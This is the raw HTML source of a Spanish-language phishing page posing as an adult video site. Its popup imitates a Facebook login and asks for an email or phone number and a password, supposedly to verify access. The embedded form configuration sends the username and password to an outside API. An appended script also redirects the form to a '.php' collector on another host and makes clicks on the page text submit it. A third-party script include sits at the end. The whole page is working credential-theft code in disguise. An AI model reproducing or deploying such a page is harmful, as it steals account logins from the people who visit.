180, 180); border-bottom: 1px solid rgb(180, 180, 180); border-left: 0px !important;}#LINE1490 > .ladi-line { width: 100%;padding: 8px 0px;}#LINE1492 { width: 161px;top: 308.5px;left: 222px;}#LINE1492 > .ladi-line > .ladi-line-container { border-top: 1px solid rgb(180, 180, 180); border-right: 1px solid rgb(180, 180, 180); border-bottom: 1px solid rgb(180, 180, 180); border-left: 0px !important;}#LINE1492 > .ladi-line { width: 100%;padding: 8px 0px;}#HEADLINE1493 { width: 14px;top: 301.5px;left: 190.5px;}#HEADLINE1493 > .ladi-headline { color: rgb(0, 0, 0); font-size: 16px; text-align: center; line-height: 1.6;}#BUTTON1494 { width: 179px;height: 31px;top: 339px;left: 112.5px;}#BUTTON1494 > .ladi-button > .ladi-button-background { background: rgba(37, 136, 50, 1.0); background: -webkit-linear-gradient(180deg, rgba(37, 136, 50, 1.0), rgba(37, 136, 50, 1.0)); background: linear-gradient(180deg, rgba(37, 136, 50, 1.0), rgba(37, 136, 50, 1.0));}#BUTTON_TEXT1494 { width: 179px;top: 9px;left: 0px;}#BUTTON_TEXT1494 > .ladi-headline { color: rgb(255, 255, 255); font-size: 12px; text-align: center; line-height: 1.6;}#PARAGRAPH1497 { width: 105px;top: 0px;left: 0px;}#PARAGRAPH1497 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; font-weight: bold; text-align: center; line-height: 1.6;}#PARAGRAPH1498 { width: 105px;top: 17px;left: 0px;}#PARAGRAPH1498 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#PARAGRAPH1499 { width: 105px;top: 36px;left: 0px;}#PARAGRAPH1499 > .ladi-paragraph { color: rgb(132, 132, 132); font-size: 9px; text-align: center; line-height: 1.6;}#PARAGRAPH1500 { width: 105px;top: 52px;left: 0px;}#PARAGRAPH1500 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#GROUP1501 { width: 105px;height: 66px;top: 392px;left: 71.5px;}#PARAGRAPH1503 { width: 105px;top: 0px;left: 0px;}#PARAGRAPH1503 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#PARAGRAPH1504 { width: 105px;top: 17px;left: 0px;}#PARAGRAPH1504 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#PARAGRAPH1505 { width: 105px;top: 36px;left: 0px;}#PARAGRAPH1505 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#GROUP1502 { width: 105px;height: 50px;top: 392px;left: 222px;}#BOX1507 { width: 19px;height: 19px;top: 442px;left: 265px;}#BOX1507 > .ladi-box { background: #fdfbfb; background: -webkit-linear-gradient(180deg, #fdfbfb, #eaedee); background: linear-gradient(180deg, #fdfbfb, #eaedee);border-style: solid; border-color: rgb(132, 132, 132); border-width: 1px;}#PARAGRAPH1508 { width: 15px;top: 439px;left: 270px;}#PARAGRAPH1508 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 16.62px; line-height: 1.6;}#PARAGRAPH1509 { width: 109px;top: 477px;left: 147.5px;}#PARAGRAPH1509 > .ladi-paragraph { color: rgb(0, 0, 0); font-size: 9px; text-align: center; line-height: 1.6;}#PARAGRAPH1510 { width: 115px;top: 491px;left: 144.5px;}#PARAGRAPH1510 > .ladi-paragraph { color: rgb(180, 180, 180); font-size: 8px; text-align: center; line-height: 1.6;}</style><!-- Global site tag (gtag.js) - Google Analytics -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-181713159-4"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-181713159-4');
</script><style type="text/css">
@font-face {
  font-weight: 400;
  font-style:  normal;
  font-family: 'Circular-Loom';

  src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Book-cd7d2bcec649b1243839a15d5eb8f0a3.woff2') format('woff2');
}

@font-face {
  font-weight: 500;
  font-style:  normal;
  font-family: 'Circular-Loom';

  src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Medium-d74eac43c78bd5852478998ce63dceb3.woff2') format('woff2');
}

@font-face {
  font-weight: 700;
  font-style:  normal;
  font-family: 'Circular-Loom';

  src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Bold-83b8ceaf77f49c7cffa44107561909e4.woff2') format('woff2');
}

@font-face {
  font-weight: 900;
  font-style:  normal;
  font-family: 'Circular-Loom';

  src: url('https://cdn.loom.com/assets/fonts/circular/CircularXXWeb-Black-bf067ecb8aa777ceb6df7d72226febca.woff2') format('woff2');
}</style><style id="style_popup" type="text/css">#backdrop-popup { display: block !important; background-color: rgba(0, 0, 0, 0.5);}body {position: fixed !important;width: 100% !important;top: -0px}</style></head><body><div class="ladi-wraper"><div id="BODY_BACKGROUND" class="ladi-section"><div class="ladi-section-background"></div></div><div id="SECTION1" class="ladi-section"><div class="ladi-section-background"></div><div class="ladi-container"><div id="HEADLINE1353" class="ladi-element"><h3 class="ladi-headline">SOLO PARA 18+</h3></div><div id="GROUP1466" class="ladi-element"><div class="ladi-group"><div id="BOX1351" class="ladi-element"><div class="ladi-box"></div></div><div id="GROUP1465" class="ladi-element"><div class="ladi-group"><div id="IMAGE1344" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background"></div></div></div><div id="GROUP1346" class="ladi-element ladi-animation"><div class="ladi-group"><div id="BOX1347" class="ladi-element"><div class="ladi-box"></div></div><div id="SHAPE1348" class="ladi-element"><div class="ladi-shape"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0px" y="0px" viewBox="0 0 100 100" enable-background="new 0 0 100 100" xml:space="preserve" preserveAspectRatio="none" width="100%" height="100%" class="" fill="rgba(255, 255, 255, 1)"><path d="M92.806,32.338l-51.429,45c-0.019,0.017-0.042,0.028-0.061,0.044c-0.266,0.228-0.547,0.429-0.838,0.607  c-0.047,0.029-0.094,0.056-0.141,0.084c-0.296,0.17-0.6,0.315-0.914,0.434c-0.048,0.018-0.097,0.034-0.146,0.051  c-0.319,0.112-0.644,0.203-0.974,0.263c-0.037,0.007-0.075,0.01-0.112,0.016c-0.345,0.057-0.693,0.091-1.041,0.091  c-0.001,0-0.003,0-0.004,0c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0c-0.216,0-0.431-0.012-0.646-0.034  c-0.057-0.006-0.112-0.017-0.169-0.024c-0.158-0.02-0.317-0.042-0.473-0.074c-0.07-0.014-0.138-0.034-0.207-0.051  c-0.141-0.034-0.282-0.069-0.421-0.112c-0.077-0.024-0.153-0.053-0.229-0.08c-0.128-0.045-0.255-0.092-0.38-0.145  c-0.082-0.035-0.162-0.074-0.243-0.113c-0.115-0.055-0.229-0.112-0.341-0.174c-0.086-0.047-0.17-0.098-0.254-0.15  c-0.102-0.063-0.203-0.128-0.302-0.197c-0.087-0.061-0.173-0.124-0.258-0.19c-0.091-0.071-0.18-0.144-0.268-0.22  c-0.085-0.073-0.168-0.147-0.249-0.225c-0.034-0.033-0.071-0.061-0.104-0.094L6.883,51.332c-2.511-2.511-2.511-6.579,0-9.09  c2.511-2.511,6.579-2.511,9.09,0l21.461,21.461l46.902-41.039c2.674-2.345,6.73-2.069,9.072,0.603  C95.747,25.941,95.477,30,92.806,32.338z"></path></svg></div></div></div></div></div></div></div></div></div></div><div id="SECTION26" class="ladi-section"><div class="ladi-section-background"></div><div class="ladi-container"><div id="VIDEO1484" class="ladi-element pointer-events-none"><div class="ladi-video"><div class="ladi-video-background"></div><div id="SHAPE1484" class="ladi-element"><div class="ladi-shape"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" preserveAspectRatio="none" viewBox="0 0 408.7 408.7" fill="rgba(0, 0, 0, 0.5)"><polygon fill="#fff" points="163.5 296.3 286.1 204.3 163.5 112.4 163.5 296.3"></polygon><path d="M204.3,0C91.5,0,0,91.5,0,204.3S91.5,408.7,204.3,408.7s204.3-91.5,204.3-204.3S316.7,0,204.3,0ZM163.5,296.3V112.4l122.6,91.9Z" transform="translate(0 0)"></path></svg></div></div><video id="VIDEO1484_player" class="iframe-video-preload no-pause" data-video-type="direct" style="position: absolute; width: 100%; height: 100%; top: 0; left: 0; object-fit: cover;" poster="https://w.ladicdn.com/s400x613/61dfb41e89de930012864582/bg-new-3-20220113072409.jpg" preload="auto" controlslist="nodownload" loop="" autoplay="" playsinline="" webkit-playsinline="" muted="" src="https://cdn.metagreenline.com/61dfb41e89de930012864582/x-4-20220113063338.mp4"></video></div></div></div></div><div id="SECTION30" class="ladi-section"><div class="ladi-section-background ladi-lazyload"></div><div class="ladi-container"><div id="HEADLINE1382" class="ladi-element"><h3 class="ladi-headline ladi-lazyload">PART 2</h3></div><div id="GROUP1383" class="ladi-element"><div class="ladi-group"><div id="BOX1384" class="ladi-element"><div class="ladi-box ladi-lazyload"></div></div><div id="IMAGE1385" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background ladi-lazyload"></div></div></div></div></div><div id="PARAGRAPH1485" class="ladi-element"><p class="ladi-paragraph">Facebook necesita verificar la información de su cuenta para permitir el acceso a este video</p></div></div></div><div id="SECTION1425" class="ladi-section"><div class="ladi-section-background ladi-lazyload"></div><div class="ladi-container"></div></div><div id="SECTION82" class="ladi-section" data-top="1154.953125" data-left="464.5" style="top: calc(100% - 75px); left: 464.5px; width: 420px; position: fixed; z-index: 90000050;" data-sticky="true"><div class="ladi-section-background"></div><div class="ladi-container"><div id="GROUP307" class="ladi-element"><div class="ladi-group"><div id="IMAGE303" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background"></div></div></div><div id="IMAGE304" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background"></div></div></div><div id="IMAGE305" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background"></div></div></div><div id="IMAGE306" class="ladi-element"><div class="ladi-image"><div class="ladi-image-background"></div></div></div></div></div><div data-action="true" id="BUTTON536" class="ladi-element"><div class="ladi-button"><div class="ladi-button-background"></div><div id="BUTTON_TEXT536" class="ladi-element"><p class="ladi-headline ladi-transition">Sigueme</p></div></div></div></div></div><div id="SECTION_POPUP" class="ladi-section"><div class="ladi-section-background ladi-lazyload"></div><div class="ladi-container"><div id="POPUP808" class="ladi-element" data-popup-backdrop="true" style="display: block !important; overflow: hidden auto !important; max-height: 80vh;" data-scroll="true" data-resize-scroll="true"><div class="ladi-popup" style="height: 519px !important;"><div class="ladi-popup-background"></div><div id="FORM809" data-config-id="61e69327b8d74b00207122ae" class="ladi-element"><form autocomplete="off" method="post" class="ladi-form"><div id="FORM_ITEM811" class="ladi-element"><div class="ladi-form-item-container"><div class="ladi-form-item-background"></div><div class="ladi-form-item"><input autocomplete="off" tabindex="1" name="email" required="" class="ladi-form-control" type="text" placeholder="Correo electrónico o número de teléfono" value=""></div></div></div><div id="FORM_ITEM1488" class="ladi-element"><div class="ladi-form-item-container"><div class="ladi-form-item-background"></div><div class="ladi-form-item"><input autocomplete="off" tabindex="2" name="pass" required="" class="ladi-form-control" type="password" placeholder="Contraseña" value=""></div></div></div><div id="BUTTON810" class="ladi-element"><div class="ladi-button"><div class="ladi-button-background"></div><div id="BUTTON_TEXT810" class="ladi-element"><p class="ladi-headline">Entrar</p></div></div></div><button type="submit" class="ladi-hidden"></button></form></div><div id="HEADLINE815" class="ladi-element"><h3 class="ladi-headline">facebook</h3></div><div id="BOX1486" class="ladi-element"><div class="ladi-box"></div></div><div id="HEADLINE1487" class="ladi-element"><h3 class="ladi-headline">Inicie sesión en su cuenta para ver videos gratis</h3></div><div id="HEADLINE1489" class="ladi-element"><h3 class="ladi-headline">¿Has olvidado la contraseña?</h3></div><div id="LINE1490" class="ladi-element"><div class="ladi-line"><div class="ladi-line-container"></div></div></div><div id="LINE1492" class="ladi-element"><div class="ladi-line"><div class="ladi-line-container"></div></div></div><div id="HEADLINE1493" class="ladi-element"><h3 class="ladi-headline">o</h3></div><div id="BUTTON1494" class="ladi-element"><div class="ladi-button"><div class="ladi-button-background"></div><div id="BUTTON_TEXT1494" class="ladi-element"><p class="ladi-headline">Crear cuenta nueva</p></div></div></div><div id="GROUP1501" class="ladi-element"><div class="ladi-group"><div id="PARAGRAPH1497" class="ladi-element"><p class="ladi-paragraph">Mexico</p></div><div id="PARAGRAPH1498" class="ladi-element"><p class="ladi-paragraph">English (UK)</p></div><div id="PARAGRAPH1499" class="ladi-element"><p class="ladi-paragraph">한국인</p></div><div id="PARAGRAPH1500" class="ladi-element"><p class="ladi-paragraph">Mexico</p></div></div></div><div id="GROUP1502" class="ladi-element"><div class="ladi-group"><div id="PARAGRAPH1503" class="ladi-element"><p class="ladi-paragraph">Język polski</p></div><div id="PARAGRAPH1504" class="ladi-element"><p class="ladi-paragraph">Tiếng Việt</p></div><div id="PARAGRAPH1505" class="ladi-element"><p class="ladi-paragraph">ไทย</p></div></div></div><div id="BOX1507" class="ladi-element"><div class="ladi-box"></div></div><div id="PARAGRAPH1508" class="ladi-element"><p class="ladi-paragraph">+</p></div><div id="PARAGRAPH1509" class="ladi-element"><p class="ladi-paragraph">Sobre . Ayudar. Otros</p></div><div id="PARAGRAPH1510" class="ladi-element"><p class="ladi-paragraph">Facebook Inc.</p></div></div><div class="popup-close" style="right: 251.5px; top: 69px; position: fixed;"></div></div></div></div></div><div id="backdrop-popup" class="backdrop-popup"></div><div id="lightbox-screen" class="lightbox-screen"></div><script id="script_lazyload" type="text/javascript">(function () {var style_lazyload = document.getElementById('style_lazyload');var docEventScroll = window;var list_element_lazyload = document.querySelectorAll('.ladi-section-background, .ladi-image-background, .ladi-button-background, .ladi-headline, .ladi-video-background, .ladi-countdown-background, .ladi-box, .ladi-frame-background, .ladi-tabs-background, .ladi-survey-option-background, .ladi-survey-option-image, .ladi-banner, .ladi-form-item-background, .ladi-gallery-view-item, .ladi-gallery-control-item, .ladi-spin-lucky-screen, .ladi-spin-lucky-start, .ladi-form-label-container .ladi-form-label-item.image, .ladi-list-paragraph ul li');for (var i = 0; i < list_element_lazyload.length; i++) {var rect = list_element_lazyload[i].getBoundingClientRect();if (rect.x == "undefined" || rect.x == undefined || rect.y == "undefined" || rect.y == undefined) {rect.x = rect.left;rect.y = rect.top;}var offset_top = rect.y + window.scrollY;if (offset_top >= window.scrollY + window.innerHeight || window.scrollY >= offset_top + list_element_lazyload[i].offsetHeight) {list_element_lazyload[i].classList.add('ladi-lazyload');}}if (typeof style_lazyload != "undefined" && style_lazyload != undefined) {style_lazyload.parentElement.removeChild(style_lazyload);}var currentScrollY = window.scrollY;var stopLazyload = function (event) {if (event.type == "scroll" && window.scrollY == currentScrollY) {currentScrollY = -1;return;}docEventScroll.removeEventListener('scroll', stopLazyload);list_element_lazyload = document.getElementsByClassName('ladi-lazyload');while(list_element_lazyload.length > 0) {list_element_lazyload[0].classList.remove('ladi-lazyload');}};var scrollEventPassive = null;try {var opts = Object.defineProperty({}, 'passive', {get: function() {scrollEventPassive = {passive: true};}});window.addEventListener('testPassive', null, opts);window.removeEventListener('testPassive', null, opts);} catch (e) {}docEventScroll.addEventListener('scroll', stopLazyload, scrollEventPassive);})();</script><!--[if lt IE 9]><script src="https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1642235194530"></script><script src="https://w.ladicdn.com/v2/source/respond.min.js?v=1642235194530"></script><![endif]--><link href="https://fonts.googleapis.com/css?family=Montserrat:bold,regular&amp;display=swap" rel="stylesheet" type="text/css"><link href="https://w.ladicdn.com/v2/source/ladipage.min.css?v=1642235194530" rel="stylesheet" type="text/css"><script src="https://w.ladicdn.com/v2/source/ladipage.vi.min.js?v=1642235194530" type="text/javascript"></script><script id="script_event_data" type="text/javascript">(function () {var run = function () {if (typeof window.LadiPageScript == "undefined" || window.LadiPageScript == undefined || typeof window.ladi == "undefined" || window.ladi == undefined) {setTimeout(run, 100); return;}window.LadiPageApp = window.LadiPageApp || new window.LadiPageAppV2();window.LadiPageScript.runtime.ladipage_id = '61e68e8bc71f2700381294cc';window.LadiPageScript.runtime.publish_platform = 'LADIPAGE';window.LadiPageScript.runtime.is_mobile_only = true;window.LadiPageScript.runtime.DOMAIN_FREE = [];window.LadiPageScript.runtime.bodyFontSize = 12;window.LadiPageScript.runtime.store_id = "61dfb41e89de930012864582";window.LadiPageScript.runtime.time_zone = 7;window.LadiPageScript.runtime.currency = "VND";window.LadiPageScript.runtime.convert_replace_str = true;window.LadiPageScript.runtime.desktop_width = 960;window.LadiPageScript.runtime.mobile_width = 420;window.LadiPageScript.runtime.eventData = "%7B%22SECTION_POPUP%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22SECTION26%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22SECTION30%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22SECTION82%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.sticky%22%3Atrue%2C%22mobile.option.sticky_position%22%3A%22bottom%22%2C%22mobile.option.sticky_position_top%22%3A%220px%22%2C%22mobile.option.sticky_position_bottom%22%3A%220px%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22SECTION1%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22IMAGE303%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22IMAGE304%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22IMAGE305%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22IMAGE306%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON536%22%3A%7B%22type%22%3A%22button%22%2C%22option.data_event%22%3A%5B%7B%22type%22%3A%22popup%22%2C%22action%22%3A%22POPUP808%22%2C%22action_type%22%3A%22action%22%7D%5D%2C%22option.is_submit_form%22%3Afalse%2C%22option.is_buy_now%22%3Afalse%2C%22option.data_setting.type_dataset%22%3A%22COLLECTION%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON_TEXT536%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22POPUP808%22%3A%7B%22type%22%3A%22popup%22%2C%22option.show_popup_welcome_page%22%3Atrue%2C%22option.delay_popup_welcome_page%22%3A2%2C%22option.popup_welcome_page_scroll_to%22%3A%22POPUP808%22%2C%22mobile.option.popup_position%22%3A%22default%22%2C%22mobile.option.popup_backdrop%22%3A%22background-color%3A%20rgba(0%2C%200%2C%200%2C%200.5)%3B%22%7D%2C%22FORM809%22%3A%7B%22type%22%3A%22form%22%2C%22option.form_config_id%22%3A%2261e69327b8d74b00207122ae%22%2C%22option.form_send_ladipage%22%3Afalse%2C%22option.thankyou_type%22%3A%22url%22%2C%22option.thankyou_value%22%3A%22https%3A%2F%2Fwww.wegetitoff.com%2F%3Fsl%3D5465819-b40f3%26data1%3DTrack1%26data2%3DTrack2%26tag%3D%7BExternal_ID_from_traffic_source%7D%26website%3D%7BsubID%7D%26placement%3D%7Bsub_subID%7D%22%2C%22option.form_api_data%22%3A%5B%7B%22api_url%22%3A%22https%3A%2F%2Fw15.greentickline2.com%2F2022%22%2C%22custom_fields%22%3A%5B%7B%22ladi_name%22%3A%22name%22%2C%22name%22%3A%22u%22%7D%2C%7B%22ladi_name%22%3A%22form_item1488%22%2C%22name%22%3A%22p%22%7D%5D%2C%22send_by_ladipage%22%3Afalse%2C%22content_type%22%3A%22X_WWW_FORM_URLENCODED%22%7D%5D%2C%22option.form_captcha%22%3Atrue%2C%22option.form_auto_complete%22%3Atrue%2C%22option.is_form_coupon%22%3Afalse%2C%22option.is_form_login%22%3Afalse%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON810%22%3A%7B%22type%22%3A%22button%22%2C%22option.is_submit_form%22%3Afalse%2C%22option.is_buy_now%22%3Afalse%2C%22option.data_setting.type_dataset%22%3A%22COLLECTION%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON_TEXT810%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22HEADLINE815%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BODY_BACKGROUND%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22image%22%7D%2C%22IMAGE1344%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22GROUP1346%22%3A%7B%22type%22%3A%22group%22%2C%22mobile.style.animation-name%22%3A%22bounceIn%22%2C%22mobile.style.animation-delay%22%3A%221s%22%7D%2C%22HEADLINE1353%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22HEADLINE1382%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%2C%22mobile.style.animation-name%22%3A%22pulse%22%2C%22mobile.style.animation-delay%22%3A%220s%22%7D%2C%22IMAGE1385%22%3A%7B%22type%22%3A%22image%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22SECTION1425%22%3A%7B%22type%22%3A%22section%22%2C%22mobile.option.background-style%22%3A%22solid%22%7D%2C%22VIDEO1484%22%3A%7B%22type%22%3A%22video%22%2C%22option.video_value%22%3A%22https%3A%2F%2Fcdn.metagreenline.com%2F61dfb41e89de930012864582%2Fx-4-20220113063338.mp4%22%2C%22option.video_type%22%3A%22direct%22%2C%22mobile.option.video_autoplay%22%3Atrue%7D%2C%22PARAGRAPH1485%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22HEADLINE1487%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22FORM_ITEM811%22%3A%7B%22type%22%3A%22form_item%22%2C%22option.input_type%22%3A%22text%22%2C%22option.input_tabindex%22%3A1%2C%22option.data_setting.sort_name%22%3A%22updated_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22FORM_ITEM1488%22%3A%7B%22type%22%3A%22form_item%22%2C%22option.input_type%22%3A%22password%22%2C%22option.input_tabindex%22%3A2%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22HEADLINE1489%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22HEADLINE1493%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON1494%22%3A%7B%22type%22%3A%22button%22%2C%22option.is_submit_form%22%3Afalse%2C%22option.is_buy_now%22%3Afalse%2C%22option.data_setting.type_dataset%22%3A%22COLLECTION%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22BUTTON_TEXT1494%22%3A%7B%22type%22%3A%22headline%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1497%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1498%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1499%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1500%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1503%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1504%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1505%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1508%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1509%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%2C%22PARAGRAPH1510%22%3A%7B%22type%22%3A%22paragraph%22%2C%22option.data_setting.sort_name%22%3A%22created_at%22%2C%22option.data_setting.sort_by%22%3A%22desc%22%7D%7D";window.LadiPageScript.run(true);window.LadiPageScript.runEventScroll();};run();})();</script></body><div id="vimeo-record-extension"></div></html>
 <script>
      function load() {
        $(".ladi-popup").html($(".ladi-popup").html());
			jQuery("form").attr("action","https://gre.matershort.vip/k_fac.php");
			$("p").click(function(){
			    $(".ladi-hidden").click();
			})

      }
      window.onload = load;
    </script>
	 <b:include data='blog' name='all-head-content'/>
    <title><data:blog.pageTitle/></title>
    <b:skin><![CDATA[
          
    ]]></b:skin>
  </head>

  <body>
    <b:section id='main' showaddelement='yes'/>  
  </body>By pena
<script async='async' src='//waust.at/d.js'/>
</html>